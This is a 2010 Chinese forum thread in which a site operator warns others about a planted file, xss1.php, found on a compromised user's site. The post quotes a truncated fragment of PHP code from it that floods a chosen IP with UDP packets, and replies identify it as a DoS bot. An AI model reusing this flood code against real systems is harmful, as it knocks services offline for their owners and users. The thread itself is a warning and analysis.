发一个php 攻击代码.大家注意.
static/image/smiley/default/sweat.gif今天收到服务商的警告.说有outgoing dos attack.并给了几个IP让我检查.
检查后发现一个用户的网站应该是被挂马,许多目录下存在这样一个文件: xss1.php,里面的内容如下:[*] $max_time){ break; }
[*]$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
[*]if($fp){ fwrite($fp, $out);
[*]fclose($fp); }}
[*]echo "Packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";?>复制代码请勿用于非法用途
[ 本帖最后由 诡谲 于 2010-12-4 12:19 编辑 ] 表示看不懂代码的我路过。
static/image/smiley/default/loveliness.gif
这个应该不是马吧!都是代码!没连接地址! 看不懂 用socket而已,可以禁用的。 fsockopen 使用udp协议 打开远端服务器的一个随机端口
发射65535次。 难道这是dos?? 这个是被挂的马吧?
相当于个小“僵尸”了,呵呵,接受黑客的URL输入参数IP向该IP的端口发UDP Flood攻击。。
网站有上传功能的应该小心。
[ 本帖最后由 liheyuan 于 2010-12-4 12:30 编辑 ] 这是端口扫描。 呃,看错了,看到65535就自动默认了。。
页:
[1]